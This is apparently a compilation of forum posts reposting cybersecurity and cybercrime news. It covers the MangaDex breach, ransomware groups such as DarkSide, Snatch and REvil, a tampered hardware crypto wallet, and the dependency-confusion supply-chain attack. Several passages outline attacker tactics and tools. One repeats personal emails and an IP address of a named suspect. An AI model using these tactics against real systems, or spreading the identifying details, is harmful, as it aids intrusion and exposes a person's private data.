Instead of keeping up a likely vulnerable website and wasting our time and efforts playing cat-and-mouse with constant attacks from DDoS to hacking, we have decided to take this opportunity to refocus and expedite our planned rewrite of the site, called v5. Contrary to our original plans, however, we will be launching this v5 as soon as the minimum essential features are ready.
As developing and maintaining MangaDex is nobody's actual job, it is difficult to give an accurate estimate as to when we'll be back up and running. It should go without saying that every one of us wants it to happen as soon as safely possible.
That said, if everything goes as smoothly as we dare to hope, we could be looking at a downtime of just a week or two. Or three." - MangaDex.Click to expand...
However, the threat actor remains undaunted, stating that there are further RCE vulnerabilities and web shells in place that MagaDev's code rewrite would protect against. Whether this is true is unknown.
Holo-Gfx warning of RCE vulnerabilities and web shells
The threat also states that they have dumped the MangaDex database but have
not published it anywhere.
Due to the largely unfettered access the threat actor appeared to have on the
site, MangaDex stated that all users should assume that their data has been
exposed.
"Moving forward however, it is in both our users’ interest and ourselves that we will consider the database breached," MangaDex warned.
With this in mind, it is advised that all users change their passwords at any other site using the same passwords as MangaDex.
If the database is eventually published, users should be on the lookout for phishing scams conducted by the other threat actors.
what do you think?
Are they going to spread in a Telegram group?
new domain?
personally i had an account there with balance and i'm not gonna see my money ever again...
share your thoughts
Article: [https://www.hstoday.us/subject-matt...e-disrupted-in-international- cyber-operation/](https://www.hstoday.us/subject-matter- areas/cybersecurity/slilpp-marketplace-disrupted-in-international-cyber- operation/)
Северный округ штата Огайо получил более $19 млн от продажи биткоинов, конфискованных в рамках дела о мошенничестве. Об этом сообщает Toledo Blade со ссылкой на исполняющего обязанности прокурора США Бриджет Бреннан.
Криптовалюту изъяли у 37-летнего жителя штата Марка Саймона. Мужчина занимался изготовлением и продажей поддельных удостоверений личности за первую криптовалюту.
Согласно сообщению Минюста США, в марте 2018 года прокуроры добивались конфискации 500 BTC. По курсу на тот момент их стоимость составляла $5,1 млн.
По данным издания, в мае 2019 года Саймон признал вину и передал криптовалюту федеральному правительству. Тогда изъятые биткоины стоили около $2,9 млн.
По словам Бреннан, цифровые активы продали за $19,23 млн. Это крупнейшая сумма, когда-либо вырученная Северным округом штата Огайо в рамках реализации конфискованного имущества. Саймона приговорили к 24 месяцам тюремного заключения.
• Source: [https://www.toledoblade.com/local/p...e-by-toledo-federal- court/stories/20210701158](https://www.toledoblade.com/local/police- fire/2021/07/01/seized-bitcoin-value-blossoms-before-sale-by-toledo-federal- court/stories/20210701158)
• Source: justice[.]gov/usao-ndoh/pr/four-toledo-area-indicted-creating-false- ids-prosecutors-seek-forfeit-54-million
Телефон и ПК, конечно же, изъяли как вещь-док. Нашли его легко, был привязан свой личный номер к телеграмму, а заинтересовались им по личным диалогом с партнёром.
По подсчетам компании Akamai, мощные вымогательские DDoS-атак становятся нормой. Хотя они не дотягивают до прошлых рекордов (можно вспомнить прошлогоднюю атаку мощностью 2,54 Тб/сек или атаку на 1,35 Тб/сек в 2018 году), это все равно большая проблема.
Дело в том, что сразу три недавние атаки входят в число шести крупнейших DDoS- атак, когда-либо обнаруженных Akamai. Эксперты объясняют, что такое количество мощных DDoS-атак на самом деле становится новой нормой. К примеру на три месяца 2021 года компания уже зафиксировала больше атак мощностью свыше 50 Гбит/сек, чем за весь 2019 год в целом.
Самыми заметными были атаки на 800+ Гбит/сек, 824 Гбит/сек и 812 Гбит/сек. Две последние произошли в один и тот же день — 24 февраля, а еще одну мощную атаку (594 Гбит/сек) компания обнаружила 5 марта.
Все три атаки вышеперечисленные атаки были нацелены на неназванную европейскую организацию из области игорной индустрии, а также на неназванную азиатскую компанию по производству видеоигр. Две из этих атак стали самыми крупными из известных на сегодняшний день вымогательских DDoS-атаками в принципе.
«Недавняя вымогательская атака со скоростью более 800 Гбит/сек, нацеленная на европейскую игорную компанию, была самой крупной и сложной из всех, что мы видели с момента массового возвращения вымогательских атак, которые начались в середине августа 2020 года», — говорят аналитики.
Click to expand...
Также в компании отмечают, что злоумышленники расширяют охват по географическим регионам и отраслям, и из-за этого количество целей на сегодня выросло на 57% по сравнению с прошлым годом.
В целом ожидается, что DDoS-кампании 2021 года будут более узконаправленными и устойчивыми. Некоторые из таких атак, нацеленные адреса двух конкретных клиентов, длились несколько дней, и хакеры старались активно эксплуатировать любые слабые места в защите компаний.
«В одной атаке злоумышленники нацелились на почти дюжину IP-адресов и перебрали несколько векторов DDoS-атак, пытаясь повысить вероятность отказа серверной среды. Фактически 65% DDoS-атак, направленных против наших клиентов, были многовекторными», — сообщают в Akamai.
Click to expand...
Источник: xakep.ru/2021/03/31/new-ddos-wave-2/
Сперва спасибо...
Эксперт по информационной безопасности Роб Дайк (Rob Dyke) обнаружил незащищенный репозиторий в GitHub и проинформировал об этом его владельца — британскую некоммерческую организацию Apperta Foundation, с которой прежде активно сотрудничал. Представители компании сначала горячо поблагодарили его, а затем на него внезапно натравили юристов и полицию, якобы за нарушение законодательства о несанкционированном доступе к компьютерным сетям.
Дополнительной скандальности этой истории придает тот факт, что Apperta Foundation продвигает открытость систем и стандартов — преимущественно в медицинской области, поскольку компанию создал и возглавляет действующий медик. Apperta также активно сотрудничает со службой Национального здравоохранения Великобритании. Сам Роб Дайк специализируется на безопасности облачных ресурсов.
Что же касается репозитория, из-за которого у Дайка начались проблемы, то в нем хранились пароли, ключи API, а также важные финансовые документы, принадлежавшие Apperta.
По словам Дайка, этот репозиторий оставался общедоступным как минимум с 2019 г. Дайк утверждает, что проинформировал Apperta в полном соответствии с процедурой ответственного раскрытия данных, принятой в этой организации. С данной процедурой он был хорошо знаком.
Для подтверждения факта передачи информации компании Дайк скопировал, зашифровал и сохранил в безопасном месте данные, которые обнаружились в репозитории, на ближайшие 90 дней. По его словам, это было частью надлежащей процедуры.
...а потом полиция и адвокаты
Спустя примерно неделю эксперт внезапно получил письмо от юристов Apperta, в котором утверждалось, что его действия были незаконными. Это немало удивило Дайка, тем более, что сотрудники Apperta хорошо его знали, и прекрасно понимали, что незаконных действий он совершать не станет.
В интервью изданию Bleeping Computer Дайк заметил, что речь шла об общедоступном репозитории, через который происходила утечка информации, хотя юристы, по-видимому, посчитали, что Дайк произвел хакерский взлом и вывел проприетарные данные из защищенного хранилища, что не соответствует истине. Дайк также предоставил им письменное обязательство удалить любые данные, полученные из этого репозитория, и предоставить подтверждение этому факту. Данные Дайк удалил.
Однако затем он получил письмо из Нортумбрийского полицейского управления, в юрисдикции которого располагается штаб-квартира Apperta, с запросом на дополнительную информации об инциденте, который в этом письме обозначен как нарушение закона о неправомерном использовании компьютерной техники.
Этот закон был принят в 1990 г. и сейчас уже считается устаревшим, поскольку допускает слишком широкие толкования своих положений. Де факто многие виды рутинной деятельности, связанной с информационной безопасностью, могут рассматриваться как нарушения этого закона, включая и получение доступа к общедоступным хранилищам, в которых обнаруживаются конфиденциальные данные. Индустрия давно уже выступает за его пересмотр и уточнения.
Исследования показывают, что до 80% британских экспертов по кибербезопасности опасаются, что их деятельность в любой момент может быть объявлена правонарушением. По сути закон это вполне допускает.
Публичных комментариев со стороны Apperta или правоохранительных органов пока не поступало.
«Отсутствие взаимопонимания между ответственными экспертами по кибербезопасности и правообладателями или вендорами осложняет жизнь обеим сторонам, — считает Анастасия Мельникова, эксперт по информационной безопасности компании SEC Consult Services. — В данном случае все выглядит так, будто кто-то в компании решил прикрыть свою ошибку, выставив Дайка в черном свете и выдав его ответственный и благонамеренный поступок за кибератаку и кражу данных, которых там не было и в помине. Остается надеяться, что эта история быстро закончится в пользу эксперта».
В России планируют ввести уголовную ответственность за передачу банковских карт третьим лицам
Недавно в Госдуме разработали законопроект, который предусматривает уголовную ответственность за неправомерное предоставление банковских карт третьим лицам. Об этом, как сообщает «Парламентская газета», в ходе правительственного часа в Совете Федерации заявил директор Росфинмониторинга Юрий Чиханчин.
«Организаторы теневых схем не стоят на месте. В теневую деятельность активно вовлекаются физические лица — дропы, чьи данные и карты используются преступниками. Для вовлечения граждан используется социальные сети, каналы, мессенджеры и сайты. Сегодня каждый третий участник подозрительных операций моложе 25 лет», — сказал глава ведомства, добавив, что преступники осознанно привлекают в работе дропами молодежь.
По словам Чиханчина, сейчас возбуждено около 400 уголовных дел, которые связаны с вовлечением дропов в незаконные банковские операции (период не уточняется, возможно, речь идет об активных делах). Все, что может сделать Росфинмониторинг — проводить совместно с Центробанком и Минфином разъяснительную работу.
«Все это говорит о необходимости скорейшего принятия системных решений. В частности, разработан проект закона, предусматривающий введение уголовной ответственности за неправомерное предоставление третьим лицам банковских карт», — сообщил Чиханчин.
Вангую, дебетухи сильно подорожают в самое ближайшее время
The krebs strikes again!
https://krebsonsecurity[.]com/2022/01/who-is-the-network-access-broker- wazawaka/
wazawaka hmmmm
Группировка вымогателей Snatch была основана и по крайней мере некоторое время управлялась жителем Екатеринбурга Семеном Третьяковым. К таким выводам пришли журналисты портала KrebsOnSecurity, которым также удалось связаться с этим человеком.
Авторы материала отметили, что, по данным ФБР США, группировка изначально называлась Team Truniger, по прозвищу основателя и организатора группы — Truniger. Ранее этот человек мог быть связан с распущенным в 2019 году объединением GandCrab, которое позднее, по мнению силовиков, воскресло под названием REvil. Исследователи Flashpoint полагают, что вербовать сторонников на русскоязычных дарк- и IT-площадках Truniger начал в 2018 году, предлагая связаться с ним через Jabber. По крайней мере одно из таких объявлений было выложено от пользователя с ником Semen7907.
По данным Constella Intelligence, пользователь Semen7907 зарегистрировался в 2017 году на русскоязычном форуме pawno.ru, используя адрес электронной почты tretyakov-files@yandex.ru. Тот же адрес электронной почты был присвоен пользователю Semen-7907 на ныне несуществующем игровом сайте Tunngle.net, данные которого были взломаны в 2020 году. Semen-7907 зарегистрировался в Tunngle с IP-адреса 31.192.175.63, который находится в Екатеринбурге.
В Skype можно найти пользователя с ником semen7907 по имени Семен Третьяков, у которого в качестве места жительства указан Екатеринбург. В базах Constella Intelligence также удалось найти аккаунт на сайте оператора связи Tele 2, принадлежащий человеку по имени Семен Сергеевич Третьяков и с адресом электронной почты tretyakov-files@ya.ru.
Вышеупомянутые учетные записи, а также адрес электронной почты semen_7907@mail.ru были зарегистрированы или использовались все с того же IP-адреса в Екатеринбурге — 31.192.175.63. Российский номер мобильного телефона, указанный в базах Tele 2, привязан к аккаунту Telegram Perchatka.
Связавшись с Третьяковым, журналисты услышали от него, что он действительно использовал ник Semen7907, однако рекрутингом кибервзломщиков не занимался. Он также заявил, что все указанные совпадения могут быть происками украинских хакеров.
source: krebsonsecurity[.]com/2023/09/a-closer-look-at-the-snatch-data-ransom- group
Аналитики Group-IB подготовили масштабное исследование, посвященное шифровальщикам. Компания сообщает, что в прошлом году количество атак шифровальщиков выросло более чем на 150% по сравнению с предыдущим годом.
Отчет гласит, что шифровальщики фактически стали угрозой номер один как для бизнеса, так и для государственных органов: число успешных атак в прошлом году выросло более чем на 150% к 2019 году, а средний размер суммы выкупа увеличился более чем в два раза и составил в 2020 году 170 000 долларов. Самыми жадными вымогателями оказались группы Maze, DoppelPaymer и RagnarLocker — суммы выкупа, которые они требовали от жертв, составляла в среднем от 1 000 000 до 2 000 000 долларов.

В первую очередь в зоне риска оказались крупные корпоративные сети — направленные атаки вымогателей (так называемый The Big Game Hunting) парализовали в 2020 году работу таких гигантов как Garmin, Canon, Campari, Capcom и Foxconn. Простой от одной атаки составлял в среднем 18 дней. Большинство атак, проанализированных исследователями, произошли в Северной Америке и Европе, где расположено большинство компаний из списка Fortune 500, а также в Латинской Америке и Азиатско-Тихоокеанском регионе.
В России, несмотря на негласное правило у киберпреступников «не работать по РУ», действовала русскоязычная преступная группа OldGremlin. Начиная с весны 2020 года OldGremlin провела не менее девяти кампаний и атаковала исключительно российские цели — банки, промышленные предприятия, медицинские организации и разработчиков софта. В августе 2020 года жертвой OldGremlin стала крупная компания с сетью региональных филиалов — за расшифровку с нее потребовали выкуп в 50 000 долларов.
Одной из основных движущих сил для роста вымогателей стала модель Ransomware- as-a-Service («Вымогательство как услуга»). Ее суть заключается в том, что разработчики продают или сдают в аренду свои вредоносные программы партнерам для дальнейшей компрометации сети, заражения и развертывания малвари. Вся полученная в виде выкупа прибыль затем распределялась между операторами и партнерами программы. Так, 64% всех атак вымогателей, проанализированных в 2020 году, были связаны с операторами, использующих модель RaaS.
Еще одна тенденция 2020 года — коллаборации между разными преступными группами. Эксперты зафиксировали в прошлом году появление в андеграунде 15 новых публичных партнерских программ-вымогателей. Действующие преступные группы, использующие вредоносные программы Trickbot, Qakbot и Dridex, все чаще помогали операторам малвари получать первоначальный доступ к корпоративным сетям.

Главным вектором атак для большинства банд вымогателей оказались публичные RDP-серверы (52%). На втором месте — фишинг (29%), затем эксплуатация общедоступных приложений (17%).
Прежде чем зашифровать данные, операторы вымогателей проводили в среднем 13 дней в скомпрометированной сети, стараясь предварительно найти и удалить все доступные резервные копии, чтобы жертва не могла восстановить зашифрованные файлы. Еще одним фактором успеха, позволившим хакерам получать выкуп, стало предварительное хищение критически важных данных — документов, отчетов, чтобы использовать их в качестве рычага для давления на жертву — моду на подобный «двойной удар» задала печально группировка Maze.
«За пандемию программы-вымогатели стали главной киберугрозой для всего мира, в том числе для России. В прошлом году мы видели многочисленные атаки OldGremline на российские предприятия, IT-компании и финансовые учреждения. В этом году эксперты уже наблюдают активность с традиционными группами типа RTM, также переключившихся на использование шифровальщиков», — говорит Олег Скулкин, ведущий специалист лаборатории компьютерной криминалистики Group- IB.
Click to expand...

Источник: xakep.ru/2021/03/04/ransomware-2020/
Возможно, это самая крупная атака хакеров.
После нескольких месяцев затишья крупная группировка REvil вернулась к работе
и заявила, что украла около 400 ГБ данных компании Midea Group, включая
исходный код прошивки и финансовые данные. Если это действительно так, это
станет самым большим взломом для REvil за последние месяцы.
По словам хакеров, они украли все данные из PLM-системы (Product Lifecycle
Management), такие как чертежи, исходный код прошивки и т. д., информацию из
систем управления версиями Git и SVN, а также финансовую информацию, которую
хакеры готовы продать.
REvil уже опубликовала большое количество файлов, предположительно украденных
у Midea Group, и они включают в себя сканы физических и цифровых удостоверений
личности, скриншоты внутреннего клиента VMware vSphere, несколько архивов 7zip
и SSH-ключ.
В китайской компании Midea Group работает более 150 000 человек, она владеет
более 200 дочерними компаниями и имеет доход более $53 млрд. Компания занимает
245-е место в списке Global Fortune 500. Компания владеет контрольным пакетом
акций немецкой компании KUKA, крупнейшего в мире производителя роботов и
бытовой техники.
В январе 2022 года по запросу США ФСБ и МВД России арестовала участников
REvil, и группа прекратила
существование , а используемая
IT-инфраструктура была нейтрализована. Однако, после отказа властей США от
сотрудничества следствие по делу хакеров REvil зашло в
тупик .
«Лаборатория Касперского» изучила нетривиальный киберинцидент, в ходе которого злоумышленникам удалось украсть 1,33 биткойнов (29 585 долларов США на момент исследования) с аппаратного кошелька.
Злоумышленники смогли украсть деньги, пока отключённое от интернета устройство лежало в сейфе владельца. В день кражи жертва не совершала с ним никаких операций, поэтому не сразу заметила, что произошло.
Как произошла кража. Эксперты проанализировали кошелёк, из которого были украдены криптоактивы, и, вскрыв устройство, обнаружили признаки злонамеренного вмешательства. Вместо ультразвуковой сварки половинки кошелька были залиты клеем и скреплены двусторонним скотчем. Кроме того, вместо оригинального был установлен другой микроконтроллер с модифицированной прошивкой и загрузчиком.
Таким образом, оказалось, что жертва купила аппаратный кошелёк, который уже был заражён, причём во время покупки заводская упаковка и голографические наклейки выглядели нетронутыми и не вызывали подозрений.
Злоумышленники внесли всего три изменения в оригинальную прошивку загрузчика и самого кошелька. Во-первых, убрали управление защитными механизмами. Во- вторых, на этапе инициализации или при сбросе кошелька случайно сгенерированная сид-фраза заменялась на одну из 20 заранее созданных и сохранённых в мошеннической прошивке. В-третьих, если владелец устанавливал дополнительный пароль для защиты мастер-ключа, использовался лишь его первый символ.
Таким образом, чтобы подобрать ключ к конкретному фальшивому кошельку, злоумышленникам нужно было перебрать всего 1280 вариантов.
source: kaspersky.ru/about/press-releases/2023_zloumyshlenniki-poddelali- apparatnyj-kriptokoshelyok-i-ukrali-iz-nego-bitkojnov-na-30-tysyach-dollarov
Trend Micro Research found dozens of DarkSide ransomware samples in the wild
and investigated how the ransomware group operates and what organizations it
typically targets.
By: Trend Micro Research
May 14, 2021
Read time: 7 min (2082 words)
Updated May 17, 2021, 3:25 a.m. Eastern Time: This article has been updated
to add references to the DarkSide victim data.
On May 7, a
ransomware
attack forced [Colonial Pipeline](https://www.reuters.com/business/energy/us-
govt-top-fuel-supplier-work-secure-pipelines-closure-enters-4th-
day-2021-05-10/), a company responsible for nearly half the fuel supply for
the US East Coast, to proactively shut down operations. Stores of gasoline,
diesel, home heating oil, jet fuel, and military supplies had been so heavily
affected that the Federal Motor Carrier Safety Administration (FMCSA)
[declared a state of emergency](https://www.fmcsa.dot.gov/emergency/esc-ssc-
wsc-regional-emergency-declaration-2021-002-05-09-2021) in 18 states to help
with the shortages.
It has been five days since the shutdown prompted by the attack, but Colonial Pipeline is still unable to resume full operations. Outages have already started affecting motorists. In [metro Atlanta, 30% of gas stations are without gasoline](https://www.reuters.com/business/energy/us-fuel-supplies- tighten-energy-pipeline-outage-enters-fifth-day-2021-05-11/), and other cities are reporting similar numbers. To keep supplies intact for essential services, the US government has issued [advisories against hoarding](https://www.theguardian.com/us-news/2021/may/11/us-colonial- pipeline-hack-gas-panic-buying).
[The FBI has confirmed that DarkSide, a cybercriminal group believed to have originated in Eastern Europe, is behind the attack](https://www.nytimes.com/2021/05/10/us/politics/pipeline-hack- darkside.html). The ransomware used by the group is a relatively new family that was first spotted in August 2020, but the group draws on experience from previous financially successful cybercrime enterprises.
Apart from locking Colonial Pipeline’s computer systems, [DarkSide](https://www.trendmicro.com/vinfo/us/threat- encyclopedia/malware/Ransom.Win32.DARKSIDE.FAIO) also [stole over 100 GB of corporate data](https://www.bloomberg.com/news/articles/2021-05-09/colonial- hackers-stole-data-thursday-ahead-of-pipeline-shutdown). This data theft is all the more relevant in light of the fact that the group has a history of doubly extorting its victims — not only asking for money to unlock the affected computers and demanding payment for the captured data, but also threatening to leak the stolen data if the victims do not pay. As we will cover later, DarkSide shows a level of innovation that sets it apart from its competition, being one of the first to offer what we call “quadruple extortion services.”
The group announced on May 12 that it had [three more victims](https://www.cnbc.com/2021/05/12/darkside-hacker-group-behind- pipeline-attack-claims-three-new-victims.html): a construction company based in Scotland, a renewable energy product reseller in Brazil, and a technology services reseller in the US. The DarkSide actors claimed to have stolen a total of 1.9 GB of data from these companies, including sensitive information such as client data, financial data, employee passports, and contracts.
Since Darkside is a [ransomware-as-a-service (RaaS)](https://www.trendmicro.com/vinfo/tmr/?/us/security/news/cybercrime- and-digital-threats/ransomware-as-a-service-ransomware-operators-find-ways-to- bring-in-business), it is possible that three different affiliate groups are behind these three attacks. Even the DarkSide actors themselves admit that they just buy access to company networks — they have no idea how access was acquired.
Trend Micro Research found dozens of DarkSide ransomware samples in the wild and investigated how the ransomware group operates and what organizations it typically targets.
The DarkSide ransomware
DarkSide offers its RaaS to affiliates for a percentage of the profits. The group presents a prime example of modern ransomware, operating with a more advanced business model. Modern ransomware identifies high-value targets and involves more precise monetization of compromised assets (with double extortion as an example). Modern ransomware attacks are also typically done by several groups who collaborate and split profits. These attacks may look more like [advanced persistent threat (APT)](https://www.trendmicro.com/vinfo/tmr/?/us/security/definition/advanced- persistent-threat) attacks than traditional ransomware events.
Here is a short timeline of DarkSide activity compiled from publicly available reports:
Initial access
In our analysis of DarkSide samples, we saw that phishing, remote desktop protocol (RDP) abuse, and exploiting known vulnerabilities are the tactics used by the group to gain initial access. The group also uses common, [legitimate tools](https://www.trendmicro.com/vinfo/tmr/?/us/security/news/cybercrime-and- digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools- weaponized-for-ransomware-in-2021) throughout the attack process to remain undetected and obfuscate its attack.
Throughout the reconnaissance and gaining-entry phases, we saw these legitimate tools used for specific purposes:
PowerShell: for reconnaissance and persistence
Metasploit Framework: for reconnaissance
Mimikatz: for reconnaissance
BloodHound: for reconnaissance
Cobalt Strike: for installation
For modern ransomware like DarkSide, gaining initial access no longer immediately leads to ransomware being dropped. There are now several steps in between that are manually executed by an attacker.
Lateral movement and privilege escalation
Lateral movement is a key discovery phase in the modern ransomware process. In general, the goal is to identify all critical data within the victim organization, including the target files and locations for the upcoming exfiltration and encryption steps.
In the case of DarkSide, we confirmed reports that the goal of lateral movement is to gain Domain Controller (DC) or Active Directory access, which will be used to steal credentials, escalate privileges, and acquire other valuable assets for data exfiltration. The group then continues its lateral movement through the system, eventually using the DC network share to deploy the ransomware to connected machines. Some of the known lateral movement methods deployed by DarkSide use PSExec and RDP. But as we previously noted, a modern ransomware group behaves with methods more commonly associated with APT groups — it adapts its tooling and methods to the victim’s network defenses.
Exfiltration
As is common practice with double extortion ransomware, critical files are exfiltrated prior to the ransomware being launched. This is the riskiest step so far in the ransomware execution process, as data exfiltration is more likely to be noticed by the victim organization’s security team. It is the last step before the ransomware is dropped, and the attack often speeds up at this point to complete the process before it is stopped.
For exfiltration, we saw the following tools being used:
7-Zip: a utility used for archiving files in preparation for exfiltration
Rclone and Mega client: tools used for exfiltrating files to cloud storage
PuTTy: an alternative application used for network file transfer
DarkSide uses several Tor-based leak sites to host stolen data. The [file- sharing services](https://www.trendmicro.com/vinfo/tmr/?/us/security/news/cybercrime- and-digital-threats/ransomware-as-a-service-ransomware-operators-find-ways-to- bring-in-business) used by the group for data exfiltration include Mega and PrivatLab.
Execution and impact
The execution of the actual ransomware occurs next. The DarkSide ransomware shares many similarities with REvil in this step of the process, including the structure of ransom notes and the use of PowerShell to execute a command that deletes shadow copies from the network. It also uses the same code to check that the victim is not located in a Commonwealth of Independent States (CIS) country.
In addition to PowerShell, which is used to install and operate the malware itself, the group reportedly uses Certutil and Bitsadmin to download the ransomware. It uses two encryption methods, depending on whether the target operating system is Windows or Linux: A ChaCha20 stream cipher with RSA-4096 is used on Linux, and Salsa20 with RSA-1024 is used on Windows.
The following figure shows a sample ransom note from DarkSide.
Figure 1. A Darkside ransom note
It is interesting to note that DarkSide’s ransom note is similar to that of Babuk, which might indicate that these two families share a link.
DarkSide ransomware targets
Based on the group’s Tor leak sites, DarkSide determines whether to pursue
targeting a potential victim organization by primarily looking at that
organization’s financial records. It also uses this information to determine
the amount of ransom to demand, with a typical ransom demand amounting to
anywhere between US$200,000 and US$2 million.
Reports say
that, based on the leak sites, there are at least 90 victims affected by
DarkSide. In total, more than 2 TB of stolen data is currently being hosted on
DarkSide sites, and 100% of victims’ stolen files are leaked.
The actors behind Darkside have stated that they avoid targeting companies in
certain industries, including healthcare, education, the public sector, and
the nonprofit sector. Organizations in manufacturing, finance, and critical
infrastructure have been identified in Trend Micro data as targets.
Based on Trend Micro data, the US is by far DarkSide’s most targeted country,
at more than 500 detections, followed by France, Belgium, and Canada. As
previously mentioned, DarkSide avoids victimizing companies in CIS countries.
Part of the ransomware execution code checks for the geolocation of potential
victims to avoid companies in these countries, although the group would likely
be aware of the location of a target organization long before the ransomware
is executed. That the group admittedly spares companies in CIS countries could
be a clue to where DarkSide actors are residing. It is possible that they do
this to avoid law enforcement action from these countries, since the
governments of some of these countries do not persecute criminal acts such as
DarkSide’s if they are done on foreign targets.
After the Colonial Pipeline attack, DarkSide released a statement on one of
its leak sites clarifying that the group did not wish to create problems for
society and that its goal was simply to make money. There is no way to verify
this statement, but we know that the group is still quite active. As
previously mentioned, DarkSide actors announced that they had stolen data from
three more victims since the Colonial Pipeline attack.
MITRE ATT&CK tactics and techniques
The following are the MITRE ATT&CK tactics and techniques associated with
DarkSide.
Conclusion
Ransomware is an old but persistently evolving threat. As demonstrated by the
recent activities of DarkSide, modern ransomware has changed in many aspects:
bigger targets, more advanced extortion techniques, and farther-reaching
consequences beyond the victims themselves.
Ransomware actors are no longer content with simply locking companies out of
their computers and asking for ransom. Now they are digging deeper into their
victims’ networks and looking for new ways to monetize their activities. For
example, a compromised cloud server can go through a [complete attack life
cycle](https://blog.trendmicro.com/the-lifecycle-of-a-compromised-cloud-
server/), from the initial compromise to data exfiltration to resale or use
for further monetization. Compromised enterprise assets are a lucrative
commodity on underground markets; cybercriminals are well aware of [how to
make money from attacking company
servers](https://www.trendmicro.com/vinfo/tmr/?/us/security/news/cybercrime-
and-digital-threats/commodified-cybercrime-infrastructure-exploring-the-
underground-services-market-for-cybercriminals).
In the Colonial Pipeline attack, DarkSide used double extortion. But some
ransomware actors have gone even further. Jon Clay, Director of Global Threat
Communications at Trend Micro, outlines the phases of ransomware:
In fact, as detailed in security reports, DarkSide offers both the DDoS and
call center options. The group is making quadruple extortion available to its
affiliates and showing a clear sign of innovation. In cybercrime, there are no
copyright or patent laws for tools and techniques. Innovation is as much about
quickly and completely copying others’ best practices as it is about coming up
with new approaches.
Ransomware will only continue to evolve. Organizations therefore need to take
the time to put in place an [incident response plan focused on the new model
of ransomware attacks](https://www.trendmicro.com/en_us/research/21/e/tips-to-
avoid-new-wave-ransomware-attacks.html). Unfortunately, some organizations may
be putting cybersecurity on the back burner. For example, some security
experts
noted that Colonial Pipeline was using a previously exploited vulnerable
version of Microsoft Exchange, among other cybersecurity lapses. A successful
attack on a company providing critical services will have rippling effects
that will harm multiple sectors of society, which is why protecting these
services should be a top priority.
In a US Senate hearing on cybersecurity threats, Senator Rob Portman of Ohio
[described the strike on Colonial
Pipeline](https://www.reuters.com/business/energy/us-fuel-supplies-tighten-
energy-pipeline-outage-enters-fifth-day-2021-05-11/) as “potentially the most
substantial and damaging attack on US critical infrastructure ever.” This
attack is a call to action for all organizations to harden their networks
against attacks and improve their network visibility.
Trend Micro has a multilayered cybersecurity platform that can help improve
your organization’s detection and response against the latest ransomware
attacks and improve your organization’s visibility.
[https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside- ransomware-and-the-us-pipeline- attac.html](https://www.trendmicro.com/en_us/research/21/e/what-we-know- about-darkside-ransomware-and-the-us-pipeline-attac.html)
Исследователю в области кибербезопасности удалось взломать внутренние системы более чем 35 крупнейших компаний, среди которых были Microsoft, Apple, PayPal, Shopify, Netflix, Yelp, Tesla и Uber.
В этом специалисту помогла новая атака на цепочку поставок софта. В ходе отработки «взлома» специалист Алекс Бирсан смог загрузить вредоносную программу в репозитории с открытым исходным кодом, включая PyPI, npm и RubyGems. В результате этот зловред автоматически разошёлся по внутренним приложениям корпораций.
Продемонстрированный исследователем способ атаки отличается от похожих схем своей сложностью, при этом для его реализации от жертвы не требуется никаких действий. А всё потому, что атака задействует уязвимость в экосистемах, предназначенных для хранения исходного кода. Эта брешь получила название «путаница зависимостей».
Поскольку обнаруживший проблему безопасности эксперт не ставил целью по- настоящему ломать системы крупнейших корпораций, он открыл информацию о дыре представителям ИТ-гигантов. В результате этичный хакер заработал $130 000.
Идея нового вектора атаки пришла в голову Бирсану в прошлом году. Во время работы с Джастином Гарднером, другим экспертом, Алекс обратил внимание на одну деталь при взаимодействии с репозиториями npm.
Согласно описанию способа атаки на BleepingComputer, исследователь начал создавать фейковые проекты с теми же именами, что были в репозиториях npm, PyPI и RubyGems. Вскоре Бирсан понял следующую зависимость: если используемый приложением пакет находится как в публичном репозитории, так и в личном, то приоритет отдаётся именно публичному.
Используя эту особенность, специалист выполнил успешную атаку на цепочку поставок и добрался до систем Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp и Uber. Этого удалось добиться простым размещением публично доступных пакетов с теми же именами, которые находились во внутренних системах корпораций.
• Source: https://twitter.com/alxbrsn
• Source: https://twitter.com/Rhynorater
• Source: https://www.bleepingcomputer[.]com/...soft-apple-more-in-novel- supply-chain-attack/
В Госдуму внесли проект о запрете организации обращения криптовалют с 1 сентября
Депутаты Госдумы внесли поправки в новую редакцию законопроекта о регулировании майнинга криптовалют. Среди изменений — предложение запретить организацию обращения криптовалют в России с 1 сентября. Документ размещен в электронной базе нижней палаты парламента.
В качестве исключения предлагается разрешить обращение криптовалют для тестовых проектов [Центробанка](https://lenta.ru/tags/organizations/bank- rossii/) в рамках эксперимента. 26 апреля авторы инициативы внесли изменения в редакцию документа.
Источник: lenta.ru
Хоть какой-то нормальный, человеческий закон примут. Для людей. Идущий в ногу
со временем.
Понапридумывали биткоинов, блокчейнов, монеро всяких и еще 100500 валют и
сервисов, голова кругом идет.
Есть же рубль, давно привычный, удобный, неволатильный ни разу.
.
Все прогнозируемо по крайней мере.
И эмитировать проще - никаких тебе затрат на майнинг, нарушений экологий, руби
себе тайгу и вставляй в станок экологически чистую древесину.
Международная организация уголовной полиции (Интерпол) объявила в розыск двух криптовалютных промоутеров из Гонконга, которые обвиняются в мошенничестве и отмывании денег через цифровые активы.
По данным местных СМИ, разыскивается Вонг Чинг-кит (Wong Ching-kit), известный как Coin Young Master, и его сообщник Мок Цун-тин (Mok Tsun-ting). В 2019 году эти двое уже были арестованы полицией Гонконга по обвинению в мошенничестве — они продавали оборудование для майнинга криптовалюты Filecoin. Позже они были освобождены под залог.
В сентябре 2023 года Мок Цун-тин вновь был арестован в рамках расследования мошенничества, связанного с криптовалютной платформой JPEX. В полицию поступило более 2 000 жалоб от жертв, которые понесли убытки на сумму около $178 млн. Обвиняемый снова был освобожден под залог.
Напомним, что проблемы у JPEX начались после предупреждения, опубликованного Комиссией по ценным бумагам и фьючерсам Гонконга (SFC), что у биржи отсутствует лицензия на работу. Позднее биржа повысила комиссии за вывод средств до $999.
Вонг Чинг-кит был одним из влиятельных лиц, продвигавших JPEX, и местные власти приказали ему прекратить продвижение платформы. Ранее он уже получал условный срок за нарушение порядка в общественных местах — криптоинфлюенсер выбросил с крыши здания наличные на сотни долларов. Он также ездил на роскошном автомобиле Lamborghini, украшенном логотипом криптовалюты, которую он продвигал.
